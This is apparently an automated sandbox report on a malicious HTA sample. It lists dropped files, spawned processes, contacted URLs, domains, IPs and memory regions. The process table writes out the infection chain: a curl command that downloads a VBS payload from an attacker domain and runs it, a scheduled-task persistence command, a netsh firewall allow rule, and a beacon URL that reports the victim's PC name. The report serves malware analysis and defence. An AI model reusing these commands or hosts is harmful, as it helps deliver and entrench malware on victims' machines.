Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
#U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta
|
HTML document, ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\Users\Public\6724f91d7b54a.vbs
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\6724f91d7b548[1].vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\hcx.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\_6724f91d7b3cb\7zxa.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\_6724f91d7b3cb\CSRPS.exe
|
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\_6724f91d7b3cb\unrar.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\6724f91d7b351[1].js
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\d4454w[1].zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\_6724f91d7b3cb\CSRPS.dll
|
data
|
dropped
|
||
C:\_6724f91d7b3cb\MPDK.bat
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\_6724f91d7b3cb\downloaded.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\#U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6724f91d7b54a.vbs https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs
|
||
C:\Windows\SysWOW64\curl.exe
|
curl -k -o C:\Users\Public\6724f91d7b54a.vbs https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724f91d7b54a.vbs
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6724f91d7b54a.vbs"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724f91d7b54a.vbs
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6724f91d7b54a.vbs"
|
||
C:\_6724f91d7b3cb\CSRPS.exe
|
"C:\_6724f91d7b3cb\CSRPS.exe"
|
||
C:\Windows\SysWOW64\schtasks.exe
|
SCHTASKS /Query /TN "CSRPS"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "CSRPS" /TR "C:\_6724f91d7b3cb\CSRPS.exe" /SC ONLOGON
/DELAY 0001:00
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="CSRPS" dir=in action=allow program="C:\_6724f91d7b3cb\CSRPS.exe"
enable=yes profile=any
|
||
C:\Windows\SysWOW64\schtasks.exe
|
SCHTASKS /Create /F /RL HIGHEST /TN "CSRPS" /TR "C:\_6724f91d7b3cb\CSRPS.exe" /SC ONLOGON /DELAY 0001:00
|
||
C:\Windows\SysWOW64\netsh.exe
|
netsh advfirewall firewall add rule name="CSRPS" dir=in action=allow program="C:\_6724f91d7b3cb\CSRPS.exe" enable=yes profile=any
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /c ipconfig /flushdns
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\_6724f91d7b3cb\CSRPS.exe
|
C:\_6724f91d7b3cb\CSRPS.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\ipconfig.exe
|
ipconfig /flushdns
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 127.0.0.1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 62 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://64.94.85.196/d4454w.zip
|
64.94.85.196
|
||
http://64.94.85.196/contador/index.php?nomepc=user-PC
|
64.94.85.196
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs
|
198.54.116.219
|
||
https://processoeconsulta.online/
|
unknown
|
||
http://www.ghisler.com/plugins.htm
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbs-
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbsrocessoeconsulta.online/6724f91d7b3c
|
unknown
|
||
http://64.94.85.196/d4454w.zipb
|
unknown
|
||
http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbs3
|
unknown
|
||
http://64.94.85.196/contador/index.php?nomepc=
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/js/6724f91d7b351.jsB
|
unknown
|
||
http://www.embarcadero.com/products/delphi
|
unknown
|
||
http://www.scootersoftware.com/bugRepMailer.php
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbsad
|
unknown
|
||
http://worldtimeapi.org/api/ip-
|
unknown
|
||
http://64.94.85.196/d4454w.zip95EE
|
unknown
|
||
http://www.totalcmd.net/directory/packer.html
|
unknown
|
||
http://www.indyproject.org/
|
unknown
|
||
http://www.scootersoftware.com/buynow?bld=%dS
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsWinSta0
|
unknown
|
||
http://worldtimeapi.org/e~
|
unknown
|
||
http://worldtimeapi.org/p
|
unknown
|
||
http://www.scootersoftware.com/
|
unknown
|
||
http://www.scootersoftware.com/buynow?bld=%d
|
unknown
|
||
http://70.34.247.142/UPLOADMAISL.phpU
|
unknown
|
||
http://www.scootersoftware.com/upgradeEMP
|
unknown
|
||
http://www.scootersoftware.com/download.php
|
unknown
|
||
http://worldtimeapi.org/
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/js/6724f91d7b351.js
|
198.54.116.219
|
||
http://worldtimeapi.org/api/ipb
|
unknown
|
||
http://worldtimeapi.org/xef
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbsU2467#U2465#U2462#U2463#U2467#U2461.
|
unknown
|
||
http://64.94.85.196/d4454w.zipn
|
unknown
|
||
http://www.scootersoftware.com/v3formats
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs~
|
unknown
|
||
https://processoeconsulta.online/d
|
unknown
|
||
http://www.scootersoftware.com/upgradeite
|
unknown
|
||
http://worldtimeapi.org:80/api/ip
|
unknown
|
||
http://worldtimeapi.org/api/ipQ
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/js/6724f91d7b351.js(
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbscurl
|
unknown
|
||
http://www.scootersoftware.com.
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsmjT
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbss
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbseC:
|
unknown
|
||
http://www.pngui.com/%E8%B4%AD%E4%B9%B0ordersU
|
unknown
|
||
http://64.94.85.196/contador/index.php?nom
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs=C:
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsu
|
unknown
|
||
http://worldtimeapi.org/api/ip
|
unknown
|
||
http://www.scootersoftware.com/upgrade
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbs
|
198.54.116.219
|
||
http://www.scootersoftware.com/support.php
|
unknown
|
||
http://worldtimeapi.org/d
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsP
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/js/6724f91d7b351.jsf
|
unknown
|
||
http://www.scootersoftware.com/download.phpS
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/js/6724f91d7b351.jsb
|
unknown
|
||
http://worldtimeapi.org/xe
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbsC
|
unknown
|
||
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbsZZC:
|
unknown
|
||
http://www.secureblackbox.com
|
unknown
|
There are 53 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
processoeconsulta.online
|
198.54.116.219
|
||
wnn565d215c.servegame.com
|
67.217.228.153
|
||
worldtimeapi.org
|
213.188.196.246
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
198.54.116.219
|
processoeconsulta.online
|
United States
|
||
64.94.85.196
|
unknown
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
||
213.188.196.246
|
worldtimeapi.org
|
Italy
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
|
Implementing
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
|
Implementing
|
||
HKEY_CURRENT_USER\SOFTWARE\Scooter Software\Beyond Compare 3
|
CacheID
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
6304000
|
trusted library allocation
|
page read and write
|
||
93E9000
|
unkown
|
page readonly
|
||
12548000
|
heap
|
page read and write
|
||
5F0E000
|
heap
|
page read and write
|
||
BA84000
|
heap
|
page read and write
|
||
D9E0000
|
heap
|
page read and write
|
||
6251000
|
trusted library allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B89000
|
heap
|
page read and write
|
||
62F7000
|
trusted library allocation
|
page read and write
|
||
CC20000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2A83000
|
heap
|
page read and write
|
||
2974000
|
direct allocation
|
page read and write
|
||
61F5000
|
heap
|
page read and write
|
||
C738000
|
heap
|
page read and write
|
||
31E4000
|
heap
|
page read and write
|
||
9077000
|
unkown
|
page read and write
|
||
BD8C000
|
heap
|
page read and write
|
||
A1BA000
|
direct allocation
|
page read and write
|
||
E095000
|
heap
|
page read and write
|
||
CC5C000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
98D000
|
stack
|
page read and write
|
||
6247000
|
trusted library allocation
|
page read and write
|
||
90A2000
|
unkown
|
page write copy
|
||
CB5A000
|
heap
|
page read and write
|
||
32D3000
|
heap
|
page read and write
|
||
6B41000
|
heap
|
page read and write
|
||
1052000
|
heap
|
page read and write
|
||
9706000
|
trusted library allocation
|
page read and write
|
||
62FF000
|
trusted library allocation
|
page read and write
|
||
CB06000
|
trusted library allocation
|
page read and write
|
||
352F000
|
unkown
|
page read and write
|
||
32C3000
|
heap
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
94E5000
|
unkown
|
page readonly
|
||
61B7000
|
heap
|
page read and write
|
||
2B44000
|
heap
|
page read and write
|
||
2B10000
|
heap
|
page read and write
|
||
32FC000
|
stack
|
page read and write
|
||
32AC000
|
heap
|
page read and write
|
||
48A000
|
unkown
|
page execute read
|
||
AF8000
|
unkown
|
page read and write
|
||
DFCE000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
93F2000
|
unkown
|
page readonly
|
||
2B51000
|
heap
|
page read and write
|
||
AB6000
|
unkown
|
page read and write
|
||
D62E000
|
heap
|
page read and write
|
||
2A76000
|
heap
|
page read and write
|
||
8E000
|
stack
|
page read and write
|
||
32DA000
|
heap
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
954B000
|
unkown
|
page readonly
|
||
AD2000
|
unkown
|
page read and write
|
||
5F0B000
|
heap
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
31BC000
|
heap
|
page read and write
|
||
345F000
|
stack
|
page read and write
|
||
3277000
|
heap
|
page read and write
|
||
CAE2000
|
trusted library allocation
|
page read and write
|
||
BC84000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5210000
|
trusted library allocation
|
page read and write
|
||
3166000
|
heap
|
page read and write
|
||
612F000
|
stack
|
page read and write
|
||
3272000
|
heap
|
page read and write
|
||
9524000
|
unkown
|
page readonly
|
||
CAF9000
|
trusted library allocation
|
page read and write
|
||
5EE7000
|
heap
|
page read and write
|
||
6308000
|
trusted library allocation
|
page read and write
|
||
2FCE000
|
stack
|
page read and write
|
||
BA7F000
|
heap
|
page read and write
|
||
9506000
|
unkown
|
page readonly
|
||
693C000
|
heap
|
page read and write
|
||
6259000
|
trusted library allocation
|
page read and write
|
||
29F8000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
94B2000
|
unkown
|
page readonly
|
||
2B51000
|
heap
|
page read and write
|
||
AE0A000
|
stack
|
page read and write
|
||
CA3E000
|
direct allocation
|
page read and write
|
||
3033000
|
heap
|
page read and write
|
||
2C6D000
|
stack
|
page read and write
|
||
2B44000
|
heap
|
page read and write
|
||
4F50000
|
heap
|
page read and write
|
||
6A07000
|
unkown
|
page execute read
|
||
32A0000
|
heap
|
page read and write
|
||
61F5000
|
heap
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
2A1C000
|
direct allocation
|
page read and write
|
||
303D000
|
stack
|
page read and write
|
||
CA3E000
|
direct allocation
|
page read and write
|
||
8ADC000
|
unkown
|
page execute read
|
||
908A000
|
unkown
|
page read and write
|
||
C35A000
|
heap
|
page read and write
|
||
304C000
|
heap
|
page read and write
|
||
2AAB000
|
heap
|
page read and write
|
||
BCC6000
|
heap
|
page read and write
|
||
49C0000
|
heap
|
page read and write
|
||
5E92000
|
heap
|
page read and write
|
||
CEB4000
|
heap
|
page read and write
|
||
2A73000
|
heap
|
page read and write
|
||
A0E4000
|
direct allocation
|
page read and write
|
||
2CBF000
|
stack
|
page read and write
|
||
62F6000
|
trusted library allocation
|
page read and write
|
||
DA9B000
|
trusted library allocation
|
page read and write
|
||
320E000
|
unkown
|
page read and write
|
||
3276000
|
heap
|
page read and write
|
||
518F000
|
stack
|
page read and write
|
||
CAF9000
|
trusted library allocation
|
page read and write
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
2B43000
|
heap
|
page read and write
|
||
25CE000
|
unkown
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
6188000
|
heap
|
page read and write
|
||
B13000
|
unkown
|
page read and write
|
||
9508000
|
unkown
|
page readonly
|
||
9D5000
|
heap
|
page read and write
|
||
31E4000
|
heap
|
page read and write
|
||
953F000
|
unkown
|
page readonly
|
||
CAF9000
|
trusted library allocation
|
page read and write
|
||
CD28000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
89A000
|
heap
|
page read and write
|
||
9499000
|
unkown
|
page readonly
|
||
61E9000
|
heap
|
page read and write
|
||
DAA4000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
28DE000
|
stack
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
2B48000
|
heap
|
page read and write
|
||
B28000
|
unkown
|
page write copy
|
||
BE94000
|
heap
|
page read and write
|
||
381F000
|
stack
|
page read and write
|
||
AE8C000
|
direct allocation
|
page read and write
|
||
CA52000
|
heap
|
page read and write
|
||
5F07000
|
heap
|
page read and write
|
||
A520000
|
direct allocation
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
89A000
|
heap
|
page read and write
|
||
371E000
|
stack
|
page read and write
|
||
ADF000
|
unkown
|
page write copy
|
||
CEF7000
|
heap
|
page read and write
|
||
BD08000
|
heap
|
page read and write
|
||
55DD000
|
unkown
|
page execute read
|
||
D18A000
|
heap
|
page read and write
|
||
5EA0000
|
heap
|
page read and write
|
||
CE30000
|
heap
|
page read and write
|
||
9410000
|
unkown
|
page readonly
|
||
2A6F000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
3166000
|
heap
|
page read and write
|
||
C528000
|
heap
|
page read and write
|
||
630B000
|
trusted library allocation
|
page read and write
|
||
5AFE000
|
stack
|
page read and write
|
||
3157000
|
heap
|
page read and write
|
||
326D000
|
heap
|
page read and write
|
||
32FE000
|
unkown
|
page read and write
|
||
3166000
|
heap
|
page read and write
|
||
B0EF000
|
heap
|
page read and write
|
||
5E91000
|
heap
|
page read and write
|
||
CD03000
|
heap
|
page read and write
|
||
6140000
|
heap
|
page read and write
|
||
5EE5000
|
heap
|
page read and write
|
||
2B60000
|
heap
|
page read and write
|
||
A2E7000
|
direct allocation
|
page read and write
|
||
31EA000
|
heap
|
page read and write
|
||
C4E7000
|
heap
|
page read and write
|
||
950A000
|
unkown
|
page readonly
|
||
2B51000
|
heap
|
page read and write
|
||
62FB000
|
trusted library allocation
|
page read and write
|
||
324C000
|
heap
|
page read and write
|
||
62FB000
|
trusted library allocation
|
page read and write
|
||
5EFC000
|
heap
|
page read and write
|
||
CC6B000
|
heap
|
page read and write
|
||
D896000
|
heap
|
page read and write
|
||
32D3000
|
heap
|
page read and write
|
||
3073000
|
heap
|
page read and write
|
||
1049000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CC20000
|
heap
|
page read and write
|
||
5FF0000
|
remote allocation
|
page read and write
|
||
62AC000
|
unkown
|
page execute read
|
||
884000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
E2E6000
|
heap
|
page read and write
|
||
3364000
|
heap
|
page read and write
|
||
36AF000
|
unkown
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
943F000
|
unkown
|
page readonly
|
||
6185000
|
heap
|
page read and write
|
||
9183000
|
unkown
|
page read and write
|
||
DA22000
|
heap
|
page read and write
|
||
C98C000
|
heap
|
page read and write
|
||
2C5E000
|
unkown
|
page read and write
|
||
2AA7000
|
heap
|
page read and write
|
||
2D5F000
|
unkown
|
page read and write
|
||
949B000
|
unkown
|
page readonly
|
||
2B51000
|
heap
|
page read and write
|
||
2A83000
|
heap
|
page read and write
|
||
C528000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
3286000
|
heap
|
page read and write
|
||
32E9000
|
heap
|
page read and write
|
||
780D000
|
unkown
|
page execute read
|
||
2B89000
|
heap
|
page read and write
|
||
CCDF000
|
heap
|
page read and write
|
||
2B83000
|
heap
|
page read and write
|
||
5EDB000
|
heap
|
page read and write
|
||
2B49000
|
heap
|
page read and write
|
||
61C8000
|
heap
|
page read and write
|
||
ACB000
|
unkown
|
page write copy
|
||
2B51000
|
heap
|
page read and write
|
||
CA10000
|
heap
|
page read and write
|
||
87E000
|
heap
|
page read and write
|
||
624C000
|
trusted library allocation
|
page read and write
|
||
CAF9000
|
trusted library allocation
|
page read and write
|
||
2A0E000
|
stack
|
page read and write
|
||
3290000
|
heap
|
page read and write
|
||
2F5D000
|
stack
|
page read and write
|
||
104E000
|
heap
|
page read and write
|
||
12500000
|
heap
|
page read and write
|
||
12532000
|
heap
|
page read and write
|
||
3414000
|
heap
|
page read and write
|
||
1050000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
C9A4000
|
direct allocation
|
page read and write
|
||
C9A4000
|
direct allocation
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
105C000
|
heap
|
page read and write
|
||
D1A0000
|
trusted library allocation
|
page read and write
|
||
2B42000
|
heap
|
page read and write
|
||
36BF000
|
stack
|
page read and write
|
||
2EEE000
|
unkown
|
page read and write
|
||
9427000
|
unkown
|
page readonly
|
||
BD08000
|
heap
|
page read and write
|
||
2A83000
|
heap
|
page read and write
|
||
945B000
|
unkown
|
page readonly
|
||
55C2000
|
unkown
|
page execute and read and write
|
||
DD7D000
|
heap
|
page read and write
|
||
90C5000
|
unkown
|
page write copy
|
||
A2D8000
|
direct allocation
|
page read and write
|
||
9CE000
|
stack
|
page read and write
|
||
2960000
|
heap
|
page read and write
|
||
5FDD000
|
unkown
|
page execute read
|
||
9533000
|
unkown
|
page readonly
|
||
3350000
|
heap
|
page read and write
|
||
1073000
|
heap
|
page read and write
|
||
C630000
|
heap
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
2BBF000
|
unkown
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
6A3A000
|
heap
|
page read and write
|
||
DFCE000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2A5E000
|
stack
|
page read and write
|
||
3033000
|
heap
|
page read and write
|
||
9517000
|
unkown
|
page readonly
|
||
61E9000
|
heap
|
page read and write
|
||
CB9C000
|
heap
|
page read and write
|
||
320E000
|
unkown
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
DBAE000
|
heap
|
page read and write
|
||
944F000
|
unkown
|
page readonly
|
||
2A94000
|
heap
|
page read and write
|
||
6248000
|
trusted library allocation
|
page read and write
|
||
12522000
|
heap
|
page read and write
|
||
CDFC000
|
stack
|
page read and write
|
||
2BCD000
|
stack
|
page read and write
|
||
CB08000
|
trusted library allocation
|
page read and write
|
||
2A23000
|
direct allocation
|
page read and write
|
||
862000
|
heap
|
page read and write
|
||
356F000
|
unkown
|
page read and write
|
||
32D3000
|
heap
|
page read and write
|
||
2810000
|
heap
|
page read and write
|
||
884000
|
heap
|
page read and write
|
||
DEC6000
|
heap
|
page read and write
|
||
9421000
|
unkown
|
page readonly
|
||
6253000
|
trusted library allocation
|
page read and write
|
||
1052000
|
heap
|
page read and write
|
||
6198000
|
heap
|
page read and write
|
||
C3DE000
|
heap
|
page read and write
|
||
288E000
|
stack
|
page read and write
|
||
32D3000
|
heap
|
page read and write
|
||
C39C000
|
heap
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
837000
|
heap
|
page read and write
|
||
A800000
|
heap
|
page read and write
|
||
6198000
|
heap
|
page read and write
|
||
A061000
|
unkown
|
page readonly
|
||
26FD000
|
stack
|
page read and write
|
